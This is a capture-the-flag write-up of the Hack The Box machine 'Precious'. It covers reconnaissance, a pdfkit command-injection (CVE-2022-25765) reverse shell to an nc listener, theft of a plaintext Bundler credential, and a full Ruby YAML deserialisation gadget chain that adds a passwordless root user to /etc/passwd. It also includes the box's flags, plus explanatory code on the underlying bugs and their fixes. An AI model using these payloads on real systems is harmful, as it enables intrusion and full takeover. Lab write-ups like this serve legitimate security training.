HTB:Precious[WriteUP]

Contents

Connect to the HTB VPN and start the target

Scan the target's TCP ports with nmap

Request port 80 with curl

Brute-force subdomains with ffuf

Open the domain in a browser

Inspect the domain's response headers with curl

Inspect the PDF's metadata with exiftool

Lateral movement

USER_FLAG:adf5793a876a190f0c08b3b6247cec32

Privilege escalation

ROOT_FLAG:f1f5fd20bc4c3cdfae0299947296fbb6


Connect to the HTB VPN and start the target

Target IP: 10.10.11.189

Assigned IP (attacker): 10.10.16.7


Scan the target's TCP ports with nmap

nmap -p- --min-rate=1500 -T5 -sS -Pn 10.10.11.189

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# nmap -p- --min-rate=1500 -T5 -sS -Pn 10.10.11.189
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-09 23:24 EST
Warning: 10.10.11.189 giving up on port because retransmission cap hit (2).
Nmap scan report for 10.10.11.189 (10.10.11.189)
Host is up (0.15s latency).
Not shown: 65507 closed tcp ports (reset), 26 filtered tcp ports (no-response)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 46.17 seconds

Only 22 and 80 are open. The retransmission warning and the 26 "filtered" ports are a side effect of -T5 with --min-rate=1500 over a 150 ms link (probes were dropped rather than answered); on a real engagement those 26 ports would deserve a slower rescan before being written off.

Run nmap again against ports 22 and 80 with default scripts and version detection

nmap -p 22,80 -sCV 10.10.11.189

Request port 80 with curl

curl -I http://10.10.11.189:80

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# curl -I http://10.10.11.189:80
HTTP/1.1 302 Moved Temporarily
Server: nginx/1.18.0
Date: Sun, 10 Nov 2024 05:20:11 GMT
Content-Type: text/html
Content-Length: 145
Connection: keep-alive
Location: http://precious.htb/

The server redirects to a virtual host name, so map that name to the target IP

echo '10.10.11.189 precious.htb' >> /etc/hosts

Brute-force subdomains with ffuf

ffuf -u http://precious.htb/ -H 'Host: FUZZ.precious.htb' -w ../dictionary/subdomains-top20000.txt -t 200 -fc 302

-fc 302 filters out the redirect seen above, which is what the server answers for a Host header it does not recognise, so only virtual hosts that actually exist would show up.

Then fuzz paths on the domain with ffuf

ffuf -u http://precious.htb/FUZZ -w ../dictionary/Common-dir.txt -t 200 -fc 302

Open the domain in a browser

The page is just a form that submits a URL to the target (a web-page-to-PDF converter); apart from that there is nothing else useful on it.

Inspect the domain's response headers with curl

curl -I http://precious.htb/

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# curl -I http://precious.htb/
HTTP/1.1 200 OK
Content-Type: text/html;charset=utf-8
Content-Length: 483
Connection: keep-alive
Status: 200 OK
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Date: Sun, 10 Nov 2024 06:06:21 GMT
X-Powered-By: Phusion Passenger(R) 6.0.15
Server: nginx/1.18.0 + Phusion Passenger(R) 6.0.15
X-Runtime: Ruby

The X-Runtime: Ruby header, together with Phusion Passenger (an application server that fronts Ruby apps behind nginx), indicates the site is written in Ruby. That narrows the search for the PDF library behind the form considerably.

Write a test.txt file locally

echo 'This is a test text' > test.txt

Start an HTTP server with Python to serve it

python -m http.server 7777

Submit the URL of test.txt on the attacker machine (http://10.10.16.7:7777/test.txt) in the form on the target so that the server fetches it

After clicking Submit the conversion succeeded and a PDF came back, which confirms the server fetches whatever URL it is given and renders it to PDF.

Inspect the PDF's metadata with exiftool

.\exiftool.exe .\vxwb2a1xjsyl4ljfe7saqov548euun2v.pdf

The Producer/Creator fields of a generated PDF normally name the library and version that built it; here they point at pdfkit.

Search searchsploit for the keyword pdfkit

searchsploit pdfkit

The version covered by this exploit matches the one used by the target

Copy the exploit into the current directory

searchsploit -m 51293.py

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# searchsploit -m 51293.py
  Exploit: pdfkit v0.8.7.2 - Command Injection
      URL: https://www.exploit-db.com/exploits/51293
     Path: /usr/share/exploitdb/exploits/ruby/local/51293.py
    Codes: CVE-2022-25765
 Verified: True
File Type: Python script, Unicode text, UTF-8 text executable
Copied to: /home/kali/Desktop/temp/51293.py

Check the parameters the exploit expects

CVE-2022-25765 is a command injection in pdfkit: the user-supplied URL is placed on the command line of the converter it shells out to without adequate escaping, so a URL whose query contains %20 followed by a backtick-quoted command gets that command executed on the server.

Capture the form submission with Yakit to see the POST parameter name (the URL is sent in a field called url)

Start an nc listener locally

nc -lvnp 1425

Run the exploit to get a reverse shell (-s is the listener, -w the target site, -p the name of the POST parameter that carries the URL)

python 51293.py -s 10.10.16.7 1425 -w http://precious.htb -p url

The listener receives the connection

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# nc -lvnp 1425
listening on [any] 1425 ...
connect to [10.10.16.7] from (UNKNOWN) [10.10.11.189] 45250
whoami
ruby
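To make the bug class behind CVE-2022-25765 concrete, here is an added example (my own toy code, not pdfkit's source and not the exploit above): a URL-to-PDF wrapper that builds its converter command as one shell string, next to the argv form that never goes through a shell. The converter binary is stood in for by echo so the effect is visible as text, and the payload shape mirrors the public PoC (a query value of %20 followed by a backtick-quoted command). The example does not reproduce pdfkit's own escaping logic, only the shell-string versus argv difference that decides whether the backticks get expanded.

```ruby
require 'uri'

# Added example (not pdfkit's code): a toy URL-to-PDF wrapper that shows the
# bug class behind CVE-2022-25765. The converter binary is replaced by `echo`
# so the effect of each command form is visible as text.
CONVERTER = 'echo'

# Vulnerable form: the URL is interpolated into ONE string. IO.popen(String)
# hands that string to /bin/sh, so `...`, $(...) and $((...)) inside the URL
# are expanded by the shell before the converter ever sees it.
def unsafe_command(url)
  %(#{CONVERTER} "#{url}")
end

# argv form: IO.popen(Array) execs the binary directly, no shell involved,
# so the URL reaches the converter byte-for-byte.
def argv_command(url)
  [CONVERTER, url]
end

# Hardened form: argv PLUS input validation (absolute http(s) URL made only of
# characters RFC 3986 allows). The validation alone is not the fix: the
# $((6*7)) case below is pure RFC 3986 and is still expanded by sh.
URI_CHARS = %r{\A[A-Za-z0-9\-._~:/?#\[\]@!$&'()*+,;=%]+\z}

def safe_command(url)
  raise ArgumentError, 'URL contains characters outside RFC 3986' unless url.match?(URI_CHARS)
  uri = URI.parse(url)
  unless uri.is_a?(URI::HTTP) && uri.host && !uri.host.empty?
    raise ArgumentError, 'only absolute http(s) URLs are accepted'
  end
  argv_command(url)
rescue URI::InvalidURIError => e
  raise ArgumentError, "unparseable URL: #{e.message}"
end

# Run a command in either form and return what the child printed.
def run(cmd)
  IO.popen(cmd, err: [:child, :out], &:read).chomp
end

# Payload in the shape the public PoC for CVE-2022-25765 uses: a query value
# that is "%20" followed by a backtick-quoted command (here a harmless id -u).
def backtick_payload(base, shell_cmd)
  "#{base}/?name=%20`#{shell_cmd}`"
end

if __FILE__ == $PROGRAM_NAME
  bt = backtick_payload('http://example.com', 'id -u')
  puts "unsafe form : #{run(unsafe_command(bt))}"   # backticks replaced by a uid
  puts "argv form   : #{run(argv_command(bt))}"     # printed literally
  begin
    safe_command(bt)
  rescue ArgumentError => e
    puts "safe form   : rejected (#{e.message})"
  end
  arith = 'http://example.com/?name=$((6*7))'        # passes the character check
  puts "unsafe form : #{run(unsafe_command(arith))}" # sh turns it into 42
  puts "safe form   : #{run(safe_command(arith))}"   # still literal
end
```

The $((6*7)) case is the point to take away: it passes a strict RFC 3986 character check and is still rewritten by sh in the string form, so validating the URL is defence in depth, not the fix. Not invoking a shell at all (the argv form, or in pdfkit's case a patched release) is what closes the bug.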


Lateral movement

Upgrade to a proper TTY

script -c /bin/bash -q /dev/null

List the users on the system

cat /etc/passwd

Users with a login shell: root, henry, ruby

Move to /tmp

cd /tmp

Find every file with "conf" in its name and save the list to res.txt

find / -name '*conf*' -type f 2>/dev/null | tee res.txt

Read res.txt line by line and grep each file for "henry"

cat res.txt | xargs -I {} sh -c 'cat {} | grep "henry"'

ruby@precious:/tmp$ cat res.txt | xargs -I {} sh -c 'cat {} | grep "henry"'
Value: henry
Value: henry
BUNDLE_HTTPS://RUBYGEMS__ORG/: "henry:Q3c1AqGHtoI0aXAYFH"

The last line is in Bundler's config format (a bundle config credential for the rubygems.org gem source, normally kept in a .bundle/config file), and it hands us henry's credentials. Running grep on the file names themselves (with -H) rather than on cat's output would also have printed which file each match came from.

Account: henry

Password: Q3c1AqGHtoI0aXAYFH

Log in to the target over SSH with these credentials

ssh henry@10.10.11.189

Locate user_flag and read it

henry@precious:~$ find / -name 'user.txt' 2>/dev/null
/home/henry/user.txt
henry@precious:~$ cat /home/henry/user.txt
adf5793a876a190f0c08b3b6247cec32

USER_FLAG:adf5793a876a190f0c08b3b6247cec32


Privilege escalation

Check which commands the current user may run with elevated privileges

sudo -l

henry@precious:~$ sudo -l
Matching Defaults entries for henry on precious:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User henry may run the following commands on precious:
    (root) NOPASSWD: /usr/bin/ruby /opt/update_dependencies.rb

Read update_dependencies.rb

cat /opt/update_dependencies.rb

# Compare installed dependencies with those specified in "dependencies.yml"
require "yaml"
require 'rubygems'

# TODO: update versions automatically
def update_gems()
end

def list_from_file
    YAML.load(File.read("dependencies.yml"))
end

def list_local_gems
    Gem::Specification.sort_by{ |g| [g.name.downcase, g.version] }.map{|g| [g.name, g.version.to_s]}
end

gems_file = list_from_file
gems_local = list_local_gems

gems_file.each do |file_name, file_version|
    gems_local.each do |local_name, local_version|
        if(file_name == local_name)
            if(file_version != local_version)
                puts "Installed version differs from the one specified in file: " + local_name
            else
                puts "Installed version is equals to the one specified in file: " + local_name
            end
        end
    end
end

A quick review shows the script compares the locally installed gem versions with the versions listed in dependencies.yml.

Two things stand out. First, the file is opened by the relative name "dependencies.yml" with no absolute path, so when the command is run through sudo it is resolved against whatever directory we run it from (sudo does not change the working directory). Second, it is read with YAML.load, which on this Ruby (2.7, Psych 3) revives arbitrary tagged Ruby objects rather than only plain data. Together that means root will deserialise a YAML file of our choosing.

Locate the file

henry@precious:/opt/sample$ find / -name 'dependencies.yml' 2>/dev/null
/opt/sample/dependencies.yml

Check its permissions

ls -l /opt/sample/dependencies.yml

henry@precious:/opt/sample$ ls -l /opt/sample/dependencies.yml
-rw-r--r-- 1 root root 26 Sep 22  2022 /opt/sample/dependencies.yml

Read it

cat /opt/sample/dependencies.yml

henry@precious:/opt/sample$ cat /opt/sample/dependencies.yml
yaml: 0.1.1
pdfkit: 0.8.6

The file is owned by root and not writable by henry, so instead of editing it we drop our own dependencies.yml in a directory we control and run the script from there.

I searched for how Ruby's YAML.load can be made to execute commands.

The payload below is the well-known universal deserialisation gadget chain for Ruby 2.x (published by elttam in 2019). Reviving the Gem::Requirement object calls its init_with, which iterates over a Gem::Package::TarReader whose io is a Net::BufferedIO; that BufferedIO's debug_output is a Net::WriteAdapter pointing at Gem::RequestSet#resolve, and the request set's sets member is another Net::WriteAdapter wrapping Kernel.system, so the string stored in git_set ends up as the argument to system(). According to the write-up, loading this document leads to RCE.

---
- !ruby/object:Gem::Installer
    i: x
- !ruby/object:Gem::SpecFetcher
    i: y
- !ruby/object:Gem::Requirement
  requirements:
    !ruby/object:Gem::Package::TarReader
    io: &1 !ruby/object:Net::BufferedIO
      io: &1 !ruby/object:Gem::Package::TarReader::Entry
         read: 0
         header: "abc"
      debug_output: &1 !ruby/object:Net::WriteAdapter
         socket: &1 !ruby/object:Gem::RequestSet
             sets: !ruby/object:Net::WriteAdapter
                 socket: !ruby/module 'Kernel'
                 method_id: :system
             git_set: id
         method_id: :resolve
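As an added example (my own code, not the script on the box and not the gadget chain above), the following shows the mechanism the payload relies on and the two changes that would close it. The Dependency class is a stand-in for a gadget class such as Gem::Requirement: Psych revives any !ruby/object:X tag by allocating X and calling X#init_with, so code in init_with runs while the document is still being parsed, before the caller ever sees the data. The assumed fixes are YAML.safe_load (which refuses classes that were not explicitly permitted) and resolving dependencies.yml against a fixed directory instead of the caller's working directory; the directory /opt/sample comes from the box, everything else here is constructed.

```ruby
require 'yaml'

# Added example (not the target's script): why YAML.load on a file you do not
# control is code execution, and the two changes that close it.
# Dependency stands in for a gadget class such as Gem::Requirement: Psych
# revives any `!ruby/object:X` tag by allocating X and calling X#init_with,
# so whatever init_with does runs during parsing.
class Dependency
  attr_reader :name, :version

  # Called by Psych with a Coder holding the mapping from the document.
  # A real gadget reaches Kernel#system from here; this one only records
  # that it ran.
  def init_with(coder)
    @name    = coder['name']
    @version = coder['version']
    Dependency.side_effects << "init_with ran for #{@name}"
  end

  def self.side_effects
    @side_effects ||= []
  end
end

# Constructed input: the same "name: version" data as dependencies.yml, but
# tagged so that the loader instantiates a class of the document author's
# choosing.
TAGGED_DOC = <<~YAML
  --- !ruby/object:Dependency
  name: pdfkit
  version: 0.8.6
YAML

# Constructed input: what the real dependencies.yml on the box contains.
PLAIN_DOC = "yaml: 0.1.1\npdfkit: 0.8.6\n"

# What update_dependencies.rb does on Ruby 2.7 (Psych 3): full object revival.
# Psych 4 renamed this behaviour to unsafe_load, so use whichever exists.
def unsafe_load(text)
  YAML.respond_to?(:unsafe_load) ? YAML.unsafe_load(text) : YAML.load(text)
end

# Fix 1: safe_load only builds scalars, arrays and hashes unless classes are
# explicitly permitted. Returns [:ok, data] or [:blocked, message].
def guarded_load(text)
  [:ok, YAML.safe_load(text)]
rescue Psych::DisallowedClass => e
  [:blocked, e.message]
end

# Fix 2: resolve the file against a fixed directory instead of the caller's
# cwd, so `sudo ruby /opt/update_dependencies.rb` cannot be pointed at /tmp.
# /opt/sample is where the box keeps the file; any other path is assumed.
def dependencies_path(base_dir = '/opt/sample')
  File.expand_path('dependencies.yml', base_dir)
end

if __FILE__ == $PROGRAM_NAME
  obj = unsafe_load(TAGGED_DOC)
  puts "unsafe_load built a #{obj.class} and ran: #{Dependency.side_effects.inspect}"
  puts "safe_load on the same document: #{guarded_load(TAGGED_DOC).inspect}"
  puts "safe_load on plain data: #{guarded_load(PLAIN_DOC).inspect}"
  puts "file the script should read: #{dependencies_path}"
end
```

Either change on its own would have stopped this particular path: with safe_load the gadget classes are never instantiated, and with an absolute path henry cannot supply the file in the first place. Both together is the right shape for a script that runs as root.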

On the attacker machine I create a dependencies.yml with this payload, putting in git_set a command that adds a passwordless uid-0 user named 0dayhp (an empty second field in /etc/passwd means no password is required, and uid/gid 0 makes the account root):

echo '0dayhp::0:0:0dayhp:/root:/bin/bash' >> /etc/passwd

---
- !ruby/object:Gem::Installer
    i: x
- !ruby/object:Gem::SpecFetcher
    i: y
- !ruby/object:Gem::Requirement
  requirements:
    !ruby/object:Gem::Package::TarReader
    io: &1 !ruby/object:Net::BufferedIO
      io: &1 !ruby/object:Gem::Package::TarReader::Entry
         read: 0
         header: "abc"
      debug_output: &1 !ruby/object:Net::WriteAdapter
         socket: &1 !ruby/object:Gem::RequestSet
             sets: !ruby/object:Net::WriteAdapter
                 socket: !ruby/module 'Kernel'
                 method_id: :system
             git_set: echo '0dayhp::0:0:0dayhp:/root:/bin/bash' >> /etc/passwd
         method_id: :resolve

Start an HTTP server locally with Python

python -m http.server 7777

On the target, change to /tmp and download the file there

wget http://10.10.16.7:7777/dependencies.yml -O dependencies.yml

Run the passwordless sudo command from that directory

henry@precious:/tmp$ sudo /usr/bin/ruby /opt/update_dependencies.rb
sh: 1: reading: not found
Traceback (most recent call last):
    33: from /opt/update_dependencies.rb:17:in `<main>'
    32: from /opt/update_dependencies.rb:10:in `list_from_file'
    31: from /usr/lib/ruby/2.7.0/psych.rb:279:in `load'
    30: from /usr/lib/ruby/2.7.0/psych/nodes/node.rb:50:in `to_ruby'
    29: from /usr/lib/ruby/2.7.0/psych/visitors/to_ruby.rb:32:in `accept'
    28: from /usr/lib/ruby/2.7.0/psych/visitors/visitor.rb:6:in `accept'
    27: from /usr/lib/ruby/2.7.0/psych/visitors/visitor.rb:16:in `visit'
    26: from /usr/lib/ruby/2.7.0/psych/visitors/to_ruby.rb:313:in `visit_Psych_Nodes_Document'
    25: from /usr/lib/ruby/2.7.0/psych/visitors/to_ruby.rb:32:in `accept'
    24: from /usr/lib/ruby/2.7.0/psych/visitors/visitor.rb:6:in `accept'
    23: from /usr/lib/ruby/2.7.0/psych/visitors/visitor.rb:16:in `visit'
    22: from /usr/lib/ruby/2.7.0/psych/visitors/to_ruby.rb:141:in `visit_Psych_Nodes_Sequence'
    21: from /usr/lib/ruby/2.7.0/psych/visitors/to_ruby.rb:332:in `register_empty'
    20: from /usr/lib/ruby/2.7.0/psych/visitors/to_ruby.rb:332:in `each'
    19: from /usr/lib/ruby/2.7.0/psych/visitors/to_ruby.rb:332:in `block in register_empty'
    18: from /usr/lib/ruby/2.7.0/psych/visitors/to_ruby.rb:32:in `accept'
    17: from /usr/lib/ruby/2.7.0/psych/visitors/visitor.rb:6:in `accept'
    16: from /usr/lib/ruby/2.7.0/psych/visitors/visitor.rb:16:in `visit'
    15: from /usr/lib/ruby/2.7.0/psych/visitors/to_ruby.rb:208:in `visit_Psych_Nodes_Mapping'
    14: from /usr/lib/ruby/2.7.0/psych/visitors/to_ruby.rb:394:in `revive'
    13: from /usr/lib/ruby/2.7.0/psych/visitors/to_ruby.rb:402:in `init_with'
    12: from /usr/lib/ruby/vendor_ruby/rubygems/requirement.rb:218:in `init_with'
    11: from /usr/lib/ruby/vendor_ruby/rubygems/requirement.rb:214:in `yaml_initialize'
    10: from /usr/lib/ruby/vendor_ruby/rubygems/requirement.rb:299:in `fix_syck_default_key_in_requirements'
     9: from /usr/lib/ruby/vendor_ruby/rubygems/package/tar_reader.rb:59:in `each'
     8: from /usr/lib/ruby/vendor_ruby/rubygems/package/tar_header.rb:101:in `from'
     7: from /usr/lib/ruby/2.7.0/net/protocol.rb:152:in `read'
     6: from /usr/lib/ruby/2.7.0/net/protocol.rb:319:in `LOG'
     5: from /usr/lib/ruby/2.7.0/net/protocol.rb:464:in `<<'
     4: from /usr/lib/ruby/2.7.0/net/protocol.rb:458:in `write'
     3: from /usr/lib/ruby/vendor_ruby/rubygems/request_set.rb:388:in `resolve'
     2: from /usr/lib/ruby/2.7.0/net/protocol.rb:464:in `<<'
     1: from /usr/lib/ruby/2.7.0/net/protocol.rb:458:in `write'
/usr/lib/ruby/2.7.0/net/protocol.rb:458:in `system': no implicit conversion of nil into String (TypeError)

The script crashes, but only after the payload has run. The traceback is the gadget chain itself (revive -> Gem::Requirement#init_with -> TarReader#each -> Net::BufferedIO#read -> LOG -> WriteAdapter -> Gem::RequestSet#resolve -> WriteAdapter -> Kernel#system): the "sh: 1: reading: not found" line is BufferedIO's own log message ("reading ... bytes") being handed to system() first, the command in git_set is handed to it next, and the TypeError at the end is the following nil member of the request set reaching system(). Check /etc/passwd to confirm

cat /etc/passwd

The line has been appended to /etc/passwd.

Switch to the 0dayhp user (no password is asked for)

su 0dayhp

henry@precious:/tmp$ su 0dayhp
root@precious:/tmp# whoami
root

Locate root_flag and read it

root@precious:/tmp# find / -name 'root.txt'
/root/root.txt
root@precious:/tmp# cat /root/root.txt
f1f5fd20bc4c3cdfae0299947296fbb6

ROOT_FLAG:f1f5fd20bc4c3cdfae0299947296fbb6

This route modifies /etc/passwd on the target; remove the added line when you are done so the box is left as you found it.
